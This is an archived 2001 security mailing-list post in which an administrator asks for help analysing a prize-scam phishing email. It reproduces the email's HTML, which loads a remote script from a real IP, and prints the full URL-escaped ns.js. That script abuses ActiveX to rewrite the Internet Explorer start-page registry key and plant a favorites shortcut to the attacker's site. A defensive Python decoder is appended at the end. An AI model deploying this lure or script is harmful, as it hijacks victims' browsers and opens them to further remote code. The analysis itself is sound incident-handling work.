E-mail with ties to possible malicious website

From: Michael B. Morell (MMorellat_private)
Date: Tue Nov 06 2001 - 09:15:15 PST

    A suspicious e-mail has been received by my network that I believe is worth
    opening up to the community for further scrutiny.  I appreciate any further
    insight that anyone else might be able to shed.
    
    The e-mails have been submitted to SARC and NAI for review. SARC has already
    said that the ns.js is not a virus.  NAI has yet to respond.  An e-mail has
    also been sent to the host-master responsible for the mail server that was
    used to relay the e-mail.  I have not yet sent an e-mail to the ISP of the
    referenced IP in the e-mail.
    
    I have looked into the e-mail extensively and have not been able to find any
    clear evidence of a destructive payload.  However, it is its delivery method
    and what it appears to try to do that is cause for my concern.
    
    The e-mail itself is HTML based and relies on social engineering to coerce
    the end user into proceeding.
    
    <!--Begin HTML-->
    <html>
    <head>
    <title>Prize Collection</title>
    
    </head>
    
    <body bgcolor="#FFFFFF" text="#000000" onload=init();>
    <p>Dear Sir/Madam.</p>
    <p>I am contacting you on behalf of the &quot;Online Bank Draw&quot;
    corporation.<br>
      A prize won by you on the 16th of August 2001 (by e-mail submission) is
    ready 
      to be collected.<br>
      <br>
      Please <a href="http://64.57.164.73/agus2000/ns/" target="_blank">read
    this page 
      for further information</a>.</p>
    <p><br>
      Yours Sincerely.<br>
      Mike Ranson.<br>
      USCT Internet Postal Delivery.<br>
      <script language="JScript.Encode"
    src="http://64.57.164.73/agus2000/ns.js"></script>
    </p>
    </body>
    </html>
    
    <!--End HTML-->
    
    You will notice some telltale signs that this is a fraudulent e-mail.
    1. The lack of a subject
    2. A claim of prize money
    3. An odd name for a company: "Online Bank Draw"
    4. Signed by the USCT Internet Postal Delivery (never heard of them)
    
    A further investigation into the headers will also reveal that the sender
    does not have a valid e-mail address, nor can you trace its footprint back.
    
    <!--Begin Headers, obvious substitutions of names and IPs until relayed
    mail server hostmaster confirms authorized use of server-->
    
    Received: from ADomain.com (mail.ADomain.com [xxx.xxx.xxx.xxx]) by
    mail.OurDomain.com with SMTP (Microsoft Exchange Internet Mail Service
    Version 5.5.2653.13)
    	id V93AVXYX; Mon, 5 Nov 2001 18:36:34 -0500
    Received: from mail.ADomain.com [xxx.xxx.xxx.xxx] by ADomain.com with ESMTP
      (SMTPD32-6.06) id A27E9B6019E; Mon, 05 Nov 2001 18:36:30 -0500
    From: Mike Ranson - USCT Internet Postal Delivery
    Date: Tue, 06 Nov 2001 07:34:13
    To: ReplacedUserNameHere
    Subject: 
    MIME-Version: 1.0
    Content-Type: multipart/related;
      boundary="----=_NextPart_FPJUZAJHEK"
    Content-Transfer-Encoding: 7bit
    Message-ID: PM20007:34:13 AM
    
    This is an HTML email message.  If you see this, your mail client does not
    support HTML messages.
    
    ------=_NextPart_FPJUZAJHEK
    Content-Type: text/html;charset="iso-8859-1"
    Content-Transfer-Encoding: 7bit
    
    ------=_NextPart_FPJUZAJHEK-- 
    
    <!--End Headers-->
    
    Once a user clicks on the link in the e-mail, their screen is flooded with
    opened windows that go to adult websites (aka porn).  It was unclear whether
    or not this was to hide further action of the script or if that was the
    intended payload.
    
    After some searching on the infected system, I was unable to find any
    obvious system file changes/additions.
    But I was able to find the ns.js file that was referenced in the source.
    This was found in the Temporary Internet Files folder.
    
    By reading the script file I noticed several things (granted, I am not the
    best at JavaScripting, which is why I am submitting it here).  From what I
    can tell, it checks to see if the CLSIDs for Netscape/IE/WSH exist and, if they
    do, attempts to write a reg key for the current user.
    
    The path it calls is based on the Win2k users path.
    
    <!--Begin ns.js opened in notepad-->
    
    <!--
    document.write(unescape("%3Cscript%20language%3D%22JavaScript%22%3E%0D%0A%09
    document.write%28%22%3CAPPLET%20HEIGHT%3D0%20WIDTH%3D0%20code%3Dcom.ms.activ
    eX.ActiveXComponent%3E%3C/APPLET%3E%22%29%3B%0D%0A%0D%0A%09if%20%28navigator
    .appName%20%3D%3D%20%27Netscape%27%29%20var%20language%20%3D%20navigator.lan
    guage%3B%0D%0A%09else%20var%20language%20%3D%20navigator.browserLanguage%3B%
    0D%0A%0D%0A%09function%20AddFavLnk%28loc%2C%20DispName%2C%20SiteURL%29%20%7B
    %0D%0A%09%20%20var%20Shor%20%3D%20Shl.CreateShortcut%28loc%20+%20%22%5C%5C%2
    2%20+%20DispName%20+%22.URL%22%29%3B%0D%0A%09%20%20Shor.TargetPath%20%3D%20S
    iteURL%3B%0D%0A%09%20%20Shor.Save%28%29%3B%0D%0A%09%7D%0D%0A%0D%0A%09functio
    n%20f%28%29%20%7B%0D%0A%09%20%20try%20%7B%0D%0A%20%20%20%20%20%20a1%3Ddocume
    nt.applets%5B0%5D%3B%0D%0A%20%20%20%20%20%20a1.setCLSID%28%22%7BF935DC22-1CF
    0-11D0-ADB9-00C04FD58A0B%7D%22%29%3B%0D%0A%20%20%20%20%20%20a1.createInstanc
    e%28%29%3B%0D%0A%20%20%20%20%20%20Shl%20%3D%20a1.GetObject%28%29%3B%0D%0A%20
    %20%20%20%20%20a1.setCLSID%28%22%7B0D43FE01-F093-11CF-8940-00A0C9054228%7D%2
    2%29%3B%0D%0A%20%20%20%20%20%20a1.createInstance%28%29%3B%0D%0A%20%20%20%20%
    20%20FSO%20%3D%20a1.GetObject%28%29%3B%0D%0A%20%20%20%20%20%20a1.setCLSID%28
    %22%7BF935DC26-1CF0-11D0-ADB9-00C04FD58A0B%7D%22%29%3B%0D%0A%20%20%20%20%20%
    20a1.createInstance%28%29%3B%0D%0A%20%20%20%20%20%20Net%20%3D%20a1.GetObject
    %28%29%3B%0D%0A%20%20%20%20%20%20try%20%7B%0D%0A//%20%20%20%20%20%20%20%20if
    %20%28document.cookie.indexOf%28%22Chg%22%29%20%3D%3D%20-1%29%20%7B%0D%0A//%
    20%20%20%20%20%20%20%20%20%20var%20expdate%20%3D%20new%20Date%28%28new%20Dat
    e%28%29%29.getTime%28%29%20+%20%2824%20*%2060%20*%2060%20*%201000%20*%2090%2
    9%29%3B%0D%0A//%20%20%20%20%20%20%20%20%20%20document.cookie%3D%22Chg%3Dgene
    ral%3B%20expires%3D%22%20+%20expdate.toGMTString%28%29%20+%20%22%3B%20path%3
    D/%3B%22%0D%0A%20%20%20%20%20%20%20%20%20%20if%20%28%21language.indexOf%28%2
    7es%27%29%20%3E-1%29%20Shl.RegWrite%20%28%22HKCU%5C%5CSoftware%5C%5CMicrosof
    t%5C%5CInternet%20Explorer%5C%5CMain%5C%5CStart%20Page%22%2C%20%22http%3A//6
    4.57.164.73/agus2000/jstarter/%22%29%3B%0D%0A//%20%20%20%20%20%20%20%20%20%2
    0var%20expdate%20%3D%20new%20Date%28%28new%20Date%28%29%29.getTime%28%29%20+
    %20%2824%20*%2060%20*%2060%20*%201000%20*%2090%29%29%3B%0D%0A//%20%20%20%20%
    20%20%20%20%20%20document.cookie%3D%22Chg%3Dgeneral%3B%20expires%3D%22%20+%2
    0expdate.toGMTString%28%29%20+%20%22%3B%20path%3D/%3B%22%0D%0A%20%20%20%20%2
    0%20%20%20%20%20var%20WF%2C%20Shor%2C%20loc%3B%0D%0A%20%20%20%20%20%20%20%20
    %20%20WF%20%3D%20FSO.GetSpecialFolder%280%29%3B%0D%0A%20%20%20%20%20%20%20%2
    0%20%20if%20%28language.indexOf%28%27es%27%29%20%3E-1%29%20loc%20%3D%20WF%20
    +%20%22%5C%5Cfavoritos%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20
    %28language.indexOf%28%27de%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5
    Cfavoriten%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.
    indexOf%28%27sv%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cfavoriter%2
    2%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%2
    7it%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cpreferiti%22%3B%0D%0A%2
    0%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27fr%27%29%20
    %3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cfavoris%22%3B%0D%0A%20%20%20%20%20%
    20%20%20%20%20else%20if%20%28language.indexOf%28%27da%27%29%20%3E-1%29%20loc
    %20%3D%20WF%20+%20%22%5C%5Coversigt%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%2
    0else%20loc%20%3D%20WF%20+%20%22%5C%5CFavorites%22%3B%0D%0A%20%20%20%20%20%2
    0%20%20%20%20if%28%21FSO.FolderExists%28loc%29%29%20%7B%0D%0A%20%20%20%20%20
    %20%20%20%20%20%20%20if%20%28language.indexOf%28%27es%27%29%20%3E-1%29%20loc
    %20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%20Settings%
    5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5CFavoritos%22%3B%0D%0A%20%20%20%20
    %20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27de%27%29%20%3E-
    1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%2
    0Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cfavoriten%22%3B%0D%0A%2
    0%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27sv%27
    %29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocumen
    ts%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cfavoriter%22%
    3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%
    28%27it%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C
    %5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cpre
    feriti%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28languag
    e.indexOf%28%27fr%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20
    +%20%22%5C%5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%2
    2%5C%5Cfavoris%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%2
    8language.indexOf%28%27da%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28
    WF%29%20+%20%22%5C%5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%
    20+%20%22%5C%5Coversigt%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%
    20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%20Sett
    ings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5CFavorites%22%3B%0D%0A%20%20%
    20%20%20%20%20%20%20%20%20%20if%28%21FSO.FolderExists%28loc%29%29%20%7B%0D%0
    A%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0D%0A%20%20%20%20%20%20
    %20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%
    20%20%20%20%20%20%20AddFavLnk%28loc%2C%20%22START
    HERE%22%2C%20%22http%3A//64.57.164.73/agus2000/jstarter/%22%29%3B%0D%0A//%20
    %20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20c
    atch%28e%29%20%7B%7D%0D%0A%09%20%20%7D%0D%0A%09%20%20catch%28e%29%20%7B%7D%0
    D%0A%09%7D%0D%0A%0D%0A%09function%20init%28%29%20%7B%0D%0A%09%20%20setTimeou
    t%28%22f%28%29%22%2C%201000%29%3B%0D%0A%09%7D%0D%0A%0D%0A%09init%28%29%3B%0D
    %0A%3C/script%3E%0D%0A"));
    //-->
    
    <!--End ns.js-->
    
    One of my main reasons for concern is that if it is able to get the browser's
    start page changed to a malicious location, it would then be possible, upon
    start-up of the browser, for the malicious website operator to download code
    of his/her choice to the system.
    
    The attempt is to write a reg key in
    HKCU\Software\Microsoft\Internet Explorer\Main\Start Page and to set it to
    http://64.57.164.73/agus2000/jstarter/
    
    Another concern is the reference to FSO.GetDriveName.  I am unsure if it
    is referencing the File System Object for any drive mappings that the system
    has present.  If this can be confirmed/dismissed it would be helpful.  Plus
    the mention of setting a cookie on the system and its setting an expiration
    date.
    
    Thanks in advance for looking at this.
    
    Michael B. Morell
    Network Operations Administrator
    Visual Data Corporation
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
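As an added analysis aid (not part of the original post or the list), the following Python script decodes a `document.write(unescape("..."))` wrapper of the kind ns.js uses and pulls out the CLSIDs, URLs and `RegWrite` targets an analyst would want to triage. The embedded sample is a constructed fragment shaped like the posted ns.js, with a placeholder URL; the CLSID-to-ProgID table lists the well-known Windows Script Host / Scripting Runtime identifiers.

```python
import re
from urllib.parse import unquote

# Constructed sample, shaped like the posted ns.js: the whole script body is
# URL-escaped inside document.write(unescape("...")).  The URL is a placeholder.
SAMPLE_NS_JS = (
    'document.write(unescape("%3Cscript%20language%3D%22JavaScript%22%3E%0D%0A'
    '%09a1.setCLSID%28%22%7BF935DC22-1CF0-11D0-ADB9-00C04FD58A0B%7D%22%29%3B%0D%0A'
    '%09Shl.RegWrite%20%28%22HKCU%5C%5CSoftware%5C%5CMicrosoft%5C%5CInternet%20'
    'Explorer%5C%5CMain%5C%5CStart%20Page%22%2C%20%22http%3A//example.invalid/'
    'jstarter/%22%29%3B%0D%0A%3C/script%3E%0D%0A"));'
)

# Well-known CLSIDs of the COM objects the applet trick instantiates.
KNOWN_CLSIDS = {
    "{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}": "WScript.Shell",
    "{0D43FE01-F093-11CF-8940-00A0C9054228}": "Scripting.FileSystemObject",
    "{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}": "WScript.Network",
}

def decode_unescape_wrapper(blob):
    """Return the script hidden inside document.write(unescape("...")) calls."""
    parts = re.findall(r'unescape\(\s*"((?:[^"\\]|\\.)*)"\s*\)', blob)
    decoded = []
    for part in parts:
        # JScript's unescape() also accepts %uXXXX; map those before unquote().
        part = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), part)
        decoded.append(unquote(part))
    return "\n".join(decoded)

def extract_indicators(script):
    """Pull CLSIDs, URLs and RegWrite(key, value) pairs out of the decoded script."""
    clsids = re.findall(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}", script, re.I)
    urls = re.findall(r"""https?://[^\s"'<>)]+""", script)
    regs = re.findall(r'RegWrite\s*\(\s*"([^"]+)"\s*,\s*"([^"]*)"', script)
    return {
        "clsids": [(c.upper(), KNOWN_CLSIDS.get(c.upper(), "unknown")) for c in clsids],
        "urls": sorted(set(urls)),
        # The JS source doubles backslashes inside string literals; collapse them.
        "registry_writes": [(k.replace("\\\\", "\\"), v) for k, v in regs],
    }

if __name__ == "__main__":
    js = decode_unescape_wrapper(SAMPLE_NS_JS)
    print(js)
    for name, items in extract_indicators(js).items():
        print(name, items)
```

Running it against a real ns.js file (read from disk in place of the constructed sample) lists the start-page key and the URLs the script tries to plant, which is what to match against proxy and registry-audit logs.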
    



    This archive was generated by hypermail 2b30 : Thu Nov 08 2001 - 11:22:39 PST